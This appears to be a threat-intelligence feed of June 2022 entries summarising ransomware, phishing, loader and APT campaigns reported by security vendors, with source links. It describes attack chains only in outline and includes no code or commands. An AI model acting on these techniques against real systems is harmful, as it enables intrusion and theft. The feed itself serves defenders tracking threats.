Source: https://blog.sekoia.io/calisto-continues-its-credential-harvesting-campaign/
2022-06-24
LockBit_Ransomware_being_distributed_using_Copyright_related_Emails
MEDIUM
Intel Source:
ASEC
Intel Name:
LockBit_Ransomware_being_distributed_using_Copyright_related_Emails
Date of Scan:
2022-06-24
Impact:
MEDIUM
Summary:
The ASEC research team has discovered LockBit ransomware being distributed via phishing e-mails disguised as copyright claims. The phishing e-mail carries a compressed file as an attachment, which contains another compressed file inside.
Source: https://asec.ahnlab.com/en/35822/
2022-06-24
BRONZ_STARLIGHT_Ransomware_Operations_levearge_HUI_Loader
MEDIUM
Intel Source:
SecureWorks
Intel Name:
BRONZ_STARLIGHT_Ransomware_Operations_levearge_HUI_Loader
Date of Scan:
2022-06-24
Impact:
MEDIUM
Summary:
Researchers at Secureworks CTU have observed a China-linked state-sponsored hacking group named Bronze Starlight deploying various ransomware families to hide the true intent of its attacks.
Source: https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader
2022-06-23
Chinese_Threat_actors_targets_Russian_Government_Agencies
LOW
Intel Source:
CERT-UA
Intel Name:
Chinese_Threat_actors_targets_Russian_Government_Agencies
Date of Scan:
2022-06-23
Impact:
LOW
Summary:
CERT-UA researchers discovered malicious files which have been used to exploit vulnerabilities in MS Office. This attack has been linked to Chinese threat actors.
Source: https://cert.gov.ua/article/375404
2022-06-23
Keona_Clipper_Leverages_Telegram_For_Anonymity
LOW
Intel Source:
Cyble
Intel Name:
Keona_Clipper_Leverages_Telegram_For_Anonymity
Date of Scan:
2022-06-23
Impact:
LOW
Summary:
Cyble researchers found a post advertising a new clipper malware, namely “Keona Clipper.” The Keona clipper is advertised as unique and anonymous software wrapped in a Telegram bot, with a focus on stealth and anonymity. Additionally, the malware disguises itself as a system file and sends victim details to a Telegram bot.
Source: https://blog.cyble.com/2022/06/22/keona-clipper-leverages-telegram-for-anonymity/
2022-06-23
AA_distribution_Qakbot_with_DarkVNC_and_Cobalt Strike
MEDIUM
Intel Source:
Palo Alto
Intel Name:
AA_distribution_Qakbot_with_DarkVNC_and_Cobalt Strike
Date of Scan:
2022-06-23
Impact:
MEDIUM
Summary:
Securonix Threat Intelligence unit has identified a new wave of QBot infections that further deliver DarkVNC and Cobalt Strike.
Source: https://twitter.com/Unit42_Intel/status/1539700018558427140 https://github.com/pan-unit42/tweets/blob/master/2022-06-21-IOCs-for-AA-distribution-Qakbot-with-DarkVNC-and-Cobalt-Strike.txt
2022-06-22
MuddyWater’s_new_campagin_targetting_Middle_East
MEDIUM
Intel Source:
Lab52
Intel Name:
MuddyWater’s_new_campagin_targetting_Middle_East
Date of Scan:
2022-06-22
Impact:
MEDIUM
Summary:
The MuddyWater threat group, allegedly sponsored by the Iranian government and linked to the Iranian Revolutionary Guard, has maintained a “long-term” infection campaign targeting Middle East countries. Researchers from Lab52 found recent samples and discovered that the attackers might modify their functionality in a later stage, based on the information obtained from the infected host, or at least use it to download and drop the next infection stage.
Source: https://lab52.io/blog/muddywaters-light-first-stager-targetting-middle-east/
2022-06-22
China_Linked_ToddyCat_APT_Pioneers_Novel_Spyware
MEDIUM
Intel Source:
Kaspersky
Intel Name:
China_Linked_ToddyCat_APT_Pioneers_Novel_Spyware
Date of Scan:
2022-06-22
Impact:
MEDIUM
Summary:
Researchers from Kaspersky found that an APT group dubbed ToddyCat has been targeting Microsoft Exchange servers throughout Asia and Europe for more than a year. They also found a previously unknown passive backdoor they named Samurai and a new trojan dubbed Ninja Trojan.
Source: https://securelist.com/toddycat/106799/
2022-06-22
Malicious_PowerShell_attack_in_Cryptocurrency_Browser_Extensions
LOW
Intel Source:
ISC.SANS
Intel Name:
Malicious_PowerShell_attack_in_Cryptocurrency_Browser_Extensions
Date of Scan:
2022-06-22
Impact:
LOW
Summary:
Researchers from SANS found a malicious PowerShell script targeting cryptocurrency browser apps or extensions.
Source: https://isc.sans.edu/diary/rss/28772
2022-06-22
Tropic_Trooper_APT_new_TTPs
MEDIUM
Intel Source:
Checkpoint
Intel Name:
Tropic_Trooper_APT_new_TTPs
Date of Scan:
2022-06-22
Impact:
MEDIUM
Summary:
Check Point researchers shared findings on an infection chain, including a previously undescribed loader (dubbed “Nimbda”) written in the Nim language, attributed to a group / activity cluster with ties to Tropic Trooper.
Source: https://research.checkpoint.com/2022/chinese-actor-takes-aim-armed-with-nim-language-and-bizarro-aes/
2022-06-22
RIG_Exploit_campaign_rapidly_modified_Raccoon_malware_with_Dridex
LOW
Intel Source:
BitDefender
Intel Name:
RIG_Exploit_campaign_rapidly_modified_Raccoon_malware_with_Dridex
Date of Scan:
2022-06-22
Impact:
LOW
Summary:
Bitdefender researchers discovered that a new RIG Exploit Kit campaign has rapidly adapted by replacing the Raccoon malware with Dridex to make the most of the ongoing campaign.
Source: https://www.bitdefender.com/blog/labs/rig-exploit-kit-swaps-dead-raccoon-with-dridex/ https://www.bitdefender.com/files/News/CaseStudies/study/417/Bitdefender-PR-Whitepaper-Raccoon-creat6205-en-EN.pdf
2022-06-22
Quantum Software Possibly Linked to Lazarus APT group
LOW
Intel Source:
Cyble
Intel Name:
Quantum Software Possibly Linked to Lazarus APT group
Date of Scan:
2022-06-22
Impact:
LOW
Summary:
Researchers from Cyble came across a post from a threat actor on a deep web forum advertising Quantum Software, an LNK file-based builder, which has possible links to the Lazarus APT group.
Source: https://blog.cyble.com/2022/06/22/quantum-software-lnk-file-based-builders-growing-in-popularity/
2022-06-22
Rise_of_LNK_Malware
MEDIUM
Intel Source:
McAfee
Intel Name:
Rise_of_LNK_Malware
Date of Scan:
2022-06-22
Impact:
MEDIUM
Summary:
Researchers at McAfee Labs have identified three campaigns in which attackers abuse Windows shortcut (LNK) files, making them extremely dangerous to ordinary users. LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/
2022-06-21
APT28_levarging_CredoMap_Malware_to-target_Ukraine
LOW
Intel Source:
CERT-UA
Intel Name:
APT28_levarging_CredoMap_Malware_to-target_Ukraine
Date of Scan:
2022-06-21
Impact:
LOW
Summary:
CERT-UA has analysed a phishing email containing a malicious document attachment related to nuclear terrorism. Opening it leads to the download of an HTML file and execution of JavaScript code (CVE-2022-30190), which further downloads and launches the CredoMap malware.
Source: https://cert.gov.ua/article/341128
2022-06-21
UAC_0098_targeting_Ukraine_Critical_Infrastructure_facilities
LOW
Intel Source:
CERT-UA
Intel Name:
UAC_0098_targeting_Ukraine_Critical_Infrastructure_facilities
Date of Scan:
2022-06-21
Impact:
LOW
Summary:
CERT-UA has analysed a phishing email containing malicious document attachments which open an HTML file and execute JavaScript code (CVE-2022-30190); this further downloads and runs the malicious program Cobalt Strike Beacon.
Source: https://cert.gov.ua/article/339662
2022-06-21
Cybercriminals_levearging_Azure_Front_Door_service_in_Phishing_attacks
LOW
Intel Source:
Resecurity
Intel Name:
Cybercriminals_levearging_Azure_Front_Door_service_in_Phishing_attacks
Date of Scan:
2022-06-21
Impact:
LOW
Summary:
Researchers at Resecurity have identified a phishing campaign delivered via Microsoft's Azure Front Door (AFD) service. This attack allows the bad actors to trick users and spread phishing content to intercept credentials for business applications and e-mail accounts.
Source: https://resecurity.com/blog/article/cybercriminals-use-azure-front-door-in-phishing-attacks
2022-06-21
Avos_Ransomware_adds_new_Arsenal
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Avos_Ransomware_adds_new_Arsenal
Date of Scan:
2022-06-21
Impact:
MEDIUM
Summary:
Researchers from Cisco Talos found a month-long AvosLocker ransomware campaign in which the threat actors leveraged Cobalt Strike, Sliver and multiple commercial network scanners.
Source: https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html
2022-06-20
Voicemail_themed_Phishing_attacks_targeting_industries_in_US
MEDIUM
Intel Source:
Zscaler
Intel Name:
Voicemail_themed_Phishing_attacks_targeting_industries_in_US
Date of Scan:
2022-06-20
Impact:
MEDIUM
Summary:
Researchers from Zscaler ThreatLabz have identified and are monitoring the activities of a threat actor that targets users in various US-based organizations with malicious voicemail-notification-themed emails in an attempt to steal their Office 365 and Outlook credentials.
Source: https://www.zscaler.com/blogs/security-research/resurgence-voicemail-themed-phishing-attacks-targeting-key-industry
2022-06-20
Client_side_Magecart_attacks_still_around_but_more_covert
MEDIUM
Intel Source:
Malwarebytes
Intel Name:
Client_side_Magecart_attacks_still_around_but_more_covert
Date of Scan:
2022-06-20
Impact:
MEDIUM
Summary:
Malwarebytes researchers say that Magecart client-side attacks are still around, though some changes have taken place in the threat landscape; newly reported domains are linked with the ‘anti-VM’ skimmer. One thing is clear: if the Magecart threat actors decided to switch their operations exclusively server-side, the majority of companies would lose visibility overnight.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/06/client-side-magecart-attacks-still-around-but-more-covert/
2022-06-20
BlackGuard_Infostealer
LOW
Intel Source:
CyberInt
Intel Name:
BlackGuard_Infostealer
Date of Scan:
2022-06-20
Impact:
LOW
Summary:
Researchers at CyberInt discovered campaigns abusing gaming forums and Discord channels to distribute BlackGuard, along with a new data exfiltration technique using Telegram.
Source: https://cyberint.com/blog/research/blackguard-stealer/
2022-06-17
Malicious_HWP_Files_distributed_through_PC_messengers
LOW
Intel Source:
ASEC
Intel Name:
Malicious_HWP_Files_distributed_through_PC_messengers
Date of Scan:
2022-06-17
Impact:
LOW
Summary:
The ASEC research team has discovered the ongoing active distribution of APT files that exploit a feature of HWP files and have been targeting South Korean users for a long time.
Source: https://asec.ahnlab.com/en/35405/
2022-06-17
CopperStealer_Malware_infecting_via_websites_hosting_fake_software
MEDIUM
Intel Source:
Trendmicro
Intel Name:
CopperStealer_Malware_infecting_via_websites_hosting_fake_software
Date of Scan:
2022-06-17
Impact:
MEDIUM
Summary:
Trend Micro noticed a new version of CopperStealer whose infection vector starts with a website offering fake cracks, followed by two attack stages: a cryptor and a dropper.
Source: https://www.trendmicro.com/de_de/research/22/f/websites-hosting-fake-cracks-spread-updated-copperstealer.html https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/f/websites-hosting-fake-cracks-spread-updated-copperstealer-malware/IOCs-websites-hosting-fake-cracks-spread-updated-copperstealer.txt
2022-06-17
Cerber2021_Ransomware_Back_In_Action
MEDIUM
Intel Source:
Cyble
Intel Name:
Cerber2021_Ransomware_Back_In_Action
Date of Scan:
2022-06-17
Impact:
MEDIUM
Summary:
Cyble Research Labs has analysed a sample of Cerber2021 ransomware, which suggests that threat actors exploit recently patched/unpatched Atlassian vulnerabilities to deliver the ransomware.
Source: https://blog.cyble.com/2022/06/17/cerber2021-ransomware-back-in-action/ https://otx.alienvault.com/indicator/domain/pigetrzlperjreyr3fbytm27bljaq4eungv3gdq2tohnoyfrqu4bx5qd.onion
2022-06-17
Malspam_pushes_Matanbuchus_malware
LOW
Intel Source:
ISC.SANS
Intel Name:
Malspam_pushes_Matanbuchus_malware
Date of Scan:
2022-06-17
Impact:
LOW
Summary:
Researchers from SANS found a malicious campaign pushing Matanbuchus malware, which leads to Cobalt Strike.
Source: https://isc.sans.edu/diary/rss/28752
2022-06-17
New_IceLoader_malware_3_0
MEDIUM
Intel Source:
Fortinet
Intel Name:
New_IceLoader_malware_3_0
Date of Scan:
2022-06-17
Impact:
MEDIUM
Summary:
While hunting for new malware families written in the Nim programming language, FortiGuard Labs discovered a loader malware with the strings “ICE_X” and “v3.0”. A loader is a type of malware that is intended for downloading and executing additional payloads provided by a threat actor to further their malicious objectives.
Source: https://www.fortinet.com/blog/threat-research/new-icexloader-3-0-developers-warm-up-to-nim
2022-06-17
New_Version_of_Raccon_Stealer
LOW
Intel Source:
S2W INC
Intel Name:
New_Version_of_Raccon_Stealer
Date of Scan:
2022-06-17
Impact:
LOW
Summary:
Researchers from S2W Inc shared details on the new version of Raccoon Stealer and its operator, who made an announcement on the dark web forum “Exploit” stating that, after three and a half months of being temporarily suspended, V2 of the stealer is operational.
Source: https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d
2022-06-16
Zero_Day_Sophos_Firewall_Exploitation_and_an_Insidious_Breach_by_DriftingCloud_threat_actor
MEDIUM
Intel Source:
Volexity
Intel Name:
Zero_Day_Sophos_Firewall_Exploitation_and_an_Insidious_Breach_by_DriftingCloud_threat_actor
Date of Scan:
2022-06-16
Impact:
MEDIUM
Summary:
Volexity observed an attack on a backdoored Sophos Firewall. This particular attack leveraged a zero-day exploit to compromise the customer's firewall. The attacker was also observed implementing an interesting webshell backdoor, creating a secondary form of persistence, and ultimately launching attacks against the customer's staff. These attacks aimed to further breach cloud-hosted web servers hosting the organization's public-facing websites.
Source: https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ https://github.com/volexity/threat-intel/blob/main/2022/2022-06-15%20DriftingCloud%20-%20Zero-Day%20Sophos%20Firewall%20Exploitation%20and%20an%20Insidious%20Breach/indicators/indicators.csv
2022-06-16
Monkeypox_phishing_outbreak
LOW
Intel Source:
Cofense
Intel Name:
Monkeypox_phishing_outbreak
Date of Scan:
2022-06-16
Impact:
LOW
Summary:
Cofense's Phishing Defence Center has seen attempts to deceive enterprise staff with a series of monkeypox-themed phishing emails. As this rare infection spreads around the globe and gains media attention, attackers are likely to continue tweaking their tactics.
Source: https://cofense.com/blog/monkeypox-phishing-outbreak-becomes-latest-lure
2022-06-16
New_Redline_InfoStealer_campaign
LOW
Intel Source:
Qualys
Intel Name:
New_Redline_InfoStealer_campaign
Date of Scan:
2022-06-16
Impact:
LOW
Summary:
Qualys researchers found a new Redline InfoStealer campaign which spreads via fake cracked software hosted on Discord’s content delivery network.
Source: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/15/new-qualys-research-report-inside-a-redline-infostealer-campaign https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf
2022-06-16
Houdini_RAT_leveraging_JavaScript_Dropper
LOW
Intel Source:
ISC.SANS
Intel Name:
Houdini_RAT_leveraging_JavaScript_Dropper
Date of Scan:
2022-06-16
Impact:
LOW
Summary:
The Houdini RAT is being delivered via a phishing email with a ZIP archive that contains a JavaScript file called “New-Order.js”.
Source: https://isc.sans.edu/diary/rss/28746
2022-06-16
QBot_returns_with_new_TTPs
LOW
Intel Source:
SocInvestigations
Intel Name:
QBot_returns_with_new_TTPs
Date of Scan:
2022-06-16
Impact:
LOW
Summary:
Socinvestigation detection and response analysts detected the banking trojan QBot coming back with new TTPs: distribution via XLSB and via XLTM files.
Source: https://www.socinvestigation.com/qbot-returns-returns-with-new-ttps-detection-response/
2022-06-16
Confluence_exploits_leveraged_to_drop_ransomware_payloads
MEDIUM
Intel Source:
Sophos
Intel Name:
Confluence_exploits_leveraged_to_drop_ransomware_payloads
Date of Scan:
2022-06-16
Impact:
MEDIUM
Summary:
Researchers at SophosLabs have identified attackers leveraging Confluence exploits against vulnerable Windows servers, dropping Cerber ransomware, pushing down Cobalt Strike shellcode, and running PowerShell commands.
Source: https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/ https://github.com/sophoslabs/IoCs/blob/master/CVE-2022-26134_attacks.csv
2022-06-15
Potential_attack_vector_using_Follina_Vulnerability
MEDIUM
Intel Source:
Qualys
Intel Name:
Potential_attack_vector_using_Follina_Vulnerability
Date of Scan:
2022-06-15
Impact:
MEDIUM
Summary:
Qualys researchers have examined a potential attack vector as well as the technical details of the Follina vulnerability.
Source: https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr
2022-06-15
Hydra_Android_Distributed_Via_Play_Store
LOW
Intel Source:
Cyble
Intel Name:
Hydra_Android_Distributed_Via_Play_Store
Date of Scan:
2022-06-15
Impact:
LOW
Summary:
During a routine threat hunting exercise, Cyble Research Labs came across a Twitter post in which a researcher mentioned an Android malware variant published on the Play Store. The variant in question acts as a hostile downloader and downloads the Hydra banking trojan.
Source: https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/ https://twitter.com/AndroidInSecure/status/1534175436187500548
2022-06-15
Old Telerik vulnerability exploitation delivering cryptominer and CobaltStrike infections
LOW
Intel Source:
Sophos
Intel Name:
Old Telerik vulnerability exploitation delivering cryptominer and CobaltStrike infections
Date of Scan:
2022-06-15
Impact:
LOW
Summary:
Researchers from Sophos discovered an unknown threat actor exploiting a three-year-old vulnerability (CVE-2019-18935) in the Telerik UI web application framework to take control of web servers, writing Cobalt Strike beacons (in the form of a DLL payload) to disk, then using the beacon to execute encoded PowerShell commands, which downloaded more malware.
Source: https://news.sophos.com/en-us/2022/06/15/telerik-ui-exploitation-leads-to-cryptominer-cobalt-strike-infections/
2022-06-15
Saitama_backdoor_using_DNS_tunneling
LOW
Intel Source:
ISC.SANS
Intel Name:
Saitama_backdoor_using_DNS_tunneling
Date of Scan:
2022-06-15
Impact:
LOW
Summary:
Researchers identified that the Saitama backdoor was used in a phishing e-mail targeting a government official from Jordan’s foreign ministry, in an attack attributed to the Iranian group APT34.
Source: https://isc.sans.edu/forums/diary/Translating+Saitamas+DNS+tunneling+messages/28738/ https://morphuslabs.com/translating-saitamas-dns-tunneling-messages-877e3a3ed1d6
2022-06-15
Panchan_Botnet_targeting_Linux_servers
MEDIUM
Intel Source:
Akamai
Intel Name:
Panchan_Botnet_targeting_Linux_servers
Date of Scan:
2022-06-15
Impact:
MEDIUM
Summary:
Researchers at Akamai have discovered Panchan, a new peer-to-peer botnet and SSH worm that has been actively breaching Linux servers. Panchan is written in Golang and uses its built-in concurrency features to maximize spreadability and execute malware modules.
Source: https://www.akamai.com/blog/security/new-p2p-botnet-panchan
2022-06-14
Purple_Fox_malware_analysis
LOW
Intel Source:
Esentire
Intel Name:
Purple_Fox_malware_analysis
Date of Scan:
2022-06-14
Impact:
LOW
Summary:
eSentire’s Threat Response Unit (TRU) team recently observed multiple Purple Fox infections. The malware targets vulnerable versions of Internet Explorer (IE). The infection starts with the execution of a malicious script via mshta.exe, a utility that runs Microsoft HTML Applications (HTA) files.
Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-purple-fox
2022-06-14
PureCrypter_dropping_RATs_and_InfoStealer
LOW
Intel Source:
Zscaler
Intel Name:
PureCrypter_dropping_RATs_and_InfoStealer
Date of Scan:
2022-06-14
Impact:
LOW
Summary:
Zscaler researchers documented the workings of a fully-featured malware loader dubbed PureCrypter that is being purchased by cybercriminals to deliver remote access trojans (RATs) and information stealers.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter
2022-06-14
How_SeaFlower_installs_backdoors_in_iOS_Android_web3_wallets
MEDIUM
Intel Source:
Confiant
Intel Name:
How_SeaFlower_installs_backdoors_in_iOS_Android_web3_wallets
Date of Scan:
2022-06-14
Impact:
MEDIUM
Summary:
Confiant believes SeaFlower is the most technically sophisticated threat targeting web3 users, right after the infamous Lazarus Group.
Source: https://blog.confiant.com/how-seaflower-%E8%97%8F%E6%B5%B7%E8%8A%B1-installs-backdoors-in-ios-android-web3-wallets-to-steal-your-seed-phrase-d25f0ccdffce
2022-06-14
ChromeLoader_adware_halted_from_broadcasting_by_Jamf_Protect
MEDIUM
Intel Source:
Jamf
Intel Name:
ChromeLoader_adware_halted_from_broadcasting_by_Jamf_Protect
Date of Scan:
2022-06-14
Impact:
MEDIUM
Summary:
CrowdStrike researchers tracked an adware campaign that injects ads into Chrome and Safari browsers on macOS. Victims are tricked into opening a DMG file and running a shell script which masquerades as a legitimate installer application.
Source: https://www.jamf.com/blog/chromeloader-adware/
2022-06-14
The_IP2Scam_tech_support_campaign_scammers
LOW
Intel Source:
Malwarebytes
Intel Name:
The_IP2Scam_tech_support_campaign_scammers
Date of Scan:
2022-06-14
Impact:
LOW
Summary:
Malwarebytes breaks down what they call the IP2Scam tech support scheme by going back in time to track previously used infrastructure.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/06/taking-down-the-ip2scam-tech-support-campaign/ https://github.com/MBThreatIntel/TSS/blob/master/digital_ocean_IP2Scam.csv
2022-06-14
Iranian_phishing_campaign_linked_to_Phosphorous_APT_group
LOW
Intel Source:
Checkpoint
Intel Name:
Iranian_phishing_campaign_linked_to_Phosphorous_APT_group
Date of Scan:
2022-06-14
Impact:
LOW
Source: https://research.checkpoint.com/2022/check-point-research-exposes-an-iranian-phishing-campaign-targeting-former-israeli-foreign-minister-former-us-ambassador-idf-general-and-defense-industry-executives/
2022-06-14
New_Linux_Rootkit_Syslogk
LOW
Intel Source:
Avast
Intel Name:
New_Linux_Rootkit_Syslogk
Date of Scan:
2022-06-14
Impact:
LOW
Summary:
Researchers from Avast spotted a new Linux rootkit, dubbed ‘Syslogk,’ that uses specially crafted “magic packets” to activate a dormant backdoor on the device.
Source: https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/
2022-06-13
Chinese_APT_GALLIUM_levarges_PingPull_RAT_in_Cyberespionage_Campaigns
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Chinese_APT_GALLIUM_levarges_PingPull_RAT_in_Cyberespionage_Campaigns
Date of Scan:
2022-06-13
Impact:
MEDIUM
Summary:
Unit 42 recently identified a new, difficult-to-detect remote access trojan named PingPull being used by GALLIUM, an advanced persistent threat (APT) group.
Source: https://unit42.paloaltonetworks.com/pingpull-gallium/
2022-06-13
UAC_0113_Sandworm_Group_targeting_media_organisations_in_Ukraine
LOW
Intel Source:
CERT-UA
Intel Name:
UAC_0113_Sandworm_Group_targeting_media_organisations_in_Ukraine
Date of Scan:
2022-06-13
Impact:
LOW
Summary:
CERT-UA has analysed a phishing email targeting media organizations in Ukraine with the subject "LIST of links to interactive maps" and an attached document of the same name. The malicious document delivers the CrescentImp malware. CERT-UA has attributed this activity with medium confidence to UAC-0113, which is associated with the Sandworm group.
Source: https://cert.gov.ua/article/160530
2022-06-13
Crypto_Miners_Leveraging_Atlassian_Zero_Day_Vulnerability
MEDIUM
Intel Source:
Checkpoint
Intel Name:
Crypto_Miners_Leveraging_Atlassian_Zero_Day_Vulnerability
Date of Scan:
2022-06-13
Impact:
MEDIUM
Summary:
Check Point has uncovered that an unauthenticated attacker can use this Atlassian zero-day vulnerability to execute arbitrary code on the target server by placing a malicious payload in the URI.
Source: https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/
2022-06-13
HelloXD_ransomware_and_links_with_x4k_threat_actor
LOW
Intel Source:
Palo Alto
Intel Name:
HelloXD_ransomware_and_links_with_x4k_threat_actor
Date of Scan:
2022-06-13
Impact:
LOW
Summary:
Researchers from Palo Alto noticed increased activity of Hello XD ransomware, whose operators are now deploying an upgraded sample featuring stronger encryption.
Source: https://unit42.paloaltonetworks.com/helloxd-ransomware/
2022-06-10
Credit_card_skimmer_evades_Virtual_Machines
LOW
Intel Source:
Malwarebytes
Intel Name:
Credit_card_skimmer_evades_Virtual_Machines
Date of Scan:
2022-06-10
Impact:
LOW
Summary:
In this blog post, Malwarebytes Labs shows how a Magecart threat actor distributing a digital skimmer is avoiding researchers, and possibly sandboxes, by ensuring users are running genuine computers and not virtual ones.
Source: https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/
2022-06-10
Symbiote_malware_detected_in_Linux
LOW
Intel Source:
BlackBerry
Intel Name:
Symbiote_malware_detected_in_Linux
Date of Scan:
2022-06-10
Impact:
LOW
Summary:
Researchers have identified the Symbiote malware, whose impact is harvesting credentials and providing remote access for the threat actor.
Source: https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat
2022-06-10
Lyceum_NET_DNS_Backdoor
MEDIUM
Intel Source:
ZScaler
Intel Name:
Lyceum_NET_DNS_Backdoor
Date of Scan:
2022-06-10
Impact:
MEDIUM
Summary:
The Iranian Lyceum APT hacking group uses a new .NET-based DNS backdoor to conduct attacks on companies in the energy and telecommunication sectors.
Source: https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor
2022-06-09
Malvertising_campaign_leads_to_fake_Firefox_update
LOW
Intel Source:
Malwarebytes
Intel Name:
Malvertising_campaign_leads_to_fake_Firefox_update
Date of Scan:
2022-06-09
Impact:
LOW
Summary:
Researchers from MalwareBytes came across a malvertising campaign leading to a fake Firefox update.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/
2022-06-09
TA570_exploiting_Follina_to_deliver_Qbot_Malware
MEDIUM
Intel Source:
ISC.SANS HelpNet Security
Intel Name:
TA570_exploiting_Follina_to_deliver_Qbot_Malware
Date of Scan:
2022-06-09
Impact:
MEDIUM
Summary:
Researchers at ISC.SANS and HelpNet Security have identified that the malicious DLL files used for Qakbot infections contain a tag indicating their specific distribution channel. This wave of malicious spam ultimately provided two separate methods of Qakbot infection. The first method is one also used by other threat actors, where a disk image contains a Windows shortcut that runs a malicious hidden DLL. The second method is a Word docx file using a CVE-2022-30190 (Follina) exploit.
Source: https://isc.sans.edu/diary/rss/28728 https://www.helpnetsecurity.com/2022/06/08/qbot-follina-exploit/
2022-06-09
State_Backed_Hackers_Exploit_Microsoft _Follina'_Bug_to_Target_Entities_in_Europe_and_U.S
MEDIUM
Intel Source:
The Hacker News
Intel Name:
State_Backed_Hackers_Exploit_Microsoft _Follina'_Bug_to_Target_Entities_in_Europe_and_U.S
Date of Scan:
2022-06-09
Impact:
MEDIUM
Summary:
A suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office "Follina" vulnerability to target government entities in Europe and the U.S.
Source: https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html
2022-06-09
Kinsing_&_Dark_IoT_botnet_among_threats_targeting_CVE_2022_26134
MEDIUM
Intel Source:
Lacework blog
Intel Name:
Kinsing_&_Dark_IoT_botnet_among_threats_targeting_CVE_2022_26134
Date of Scan:
2022-06-09
Impact:
MEDIUM
Summary:
Details regarding the recent Confluence OGNL (CVE-2022-26134) exploit were released to the public on June 3rd 2022, with Lacework seeing multiple attacks in the wild from both uncategorized and named threats. As of yesterday, Lacework has observed active exploitation by known cloud threat malware families such as Kinsing, “Hezb”, and the Dark.IoT botnet, and provides a current inventory of the top threats seen exploiting this latest Confluence vulnerability.
Source: https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/
2022-06-09
Aoqin_Dragon_Chinese_linked_APT_spying_for_10_years
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
Aoqin_Dragon_Chinese_linked_APT_spying_for_10_years
Date of Scan:
2022-06-09
Impact:
MEDIUM
Summary:
SentinelLabs has uncovered a cluster of activity primarily targeting organizations in Southeast Asia and Australia. The threat actor's primary focus is espionage and relates to targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. This activity is tracked as 'Aoqin Dragon'. Attacks attributable to Aoqin Dragon typically drop one of two backdoors, Mongall and a modified version of the open source Heyoka project.
Source: https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/
2022-06-08
Spam_Campaign_targeting_victims_with_SVCReady_Malware
MEDIUM
+
Intel Source:
HP Wolf Security
Intel Name:
Spam_Campaign_targeting_victims_with_SVCReady_Malware
Date of Scan:
2022-06-08
Impact:
MEDIUM
Summary:
Researchers at HP Wolf Security have identified new malicious spam campaigns spreading a previously unknown malware family called 'SVCReady'. The malware is notable for the unusual way it is delivered to target PCs, using shellcode hidden in the properties of Microsoft Office documents.
Source: https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
2022-06-08
Cuba_Ransomware_Group_new_variant
LOW
+
Intel Source:
Trend Micro
Intel Name:
Cuba_Ransomware_Group_new_variant
Date of Scan:
2022-06-08
Impact:
LOW
Summary:
Researchers at Trend Micro identified a new variant, with the malware authors appearing to push updates to the current binary.
Source: https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html
2022-06-08
Operation_Tejas
LOW
+
Intel Source:
Qi Anxin Threat Intelligence Center
Intel Name:
Operation_Tejas
Date of Scan:
2022-06-08
Impact:
LOW
Summary:
Qi Anxin Threat Intelligence Center published the article "Operation Magichm: A Brief Talk on the Manlinghua Organization's CHM File Delivery and Follow-up Operations" in 2021. In addition to the new attack methods and samples used in the latest attack in April, the Intel Center also provides an overview of the recent phishing activities of Maya Elephant (APT-Q-41) and the basics of Diamondback (APT-Q-39) this year.
Source: https://mp-weixin-qq-com.translate.goog/s/8j_rHA7gdMxY1_X8alj8Zg?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=en
2022-06-08
Black_Basta_Ransomware_leverage_QBot_for_lateral_movement
MEDIUM
+
Intel Source:
NCC Group
Intel Name:
Black_Basta_Ransomware_leverage_QBot_for_lateral_movement
Date of Scan:
2022-06-08
Impact:
MEDIUM
Summary:
Researchers at NCC Group spotted a new partnership between the Black Basta ransomware group and the QBot malware operation.
Source: https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/
2022-06-08
Bumblebee_Loader_on_the_rise
MEDIUM
+
Intel Source:
Cyble blog
Intel Name:
Bumblebee_Loader_on_the_rise
Date of Scan:
2022-06-08
Impact:
MEDIUM
Summary:
In March 2022, a new malware named "Bumblebee" was discovered and reportedly distributed via spam campaigns. Researchers identified that Bumblebee is a replacement for the BazarLoader malware, which has delivered Conti ransomware in the past. Bumblebee acts as a downloader and delivers known attack frameworks and open-source tools such as Cobalt Strike, shellcode, Sliver and Meterpreter, and also downloads other types of malware such as ransomware and trojans. Cyble intelligence indicates that incidents of Bumblebee infection are on the rise.
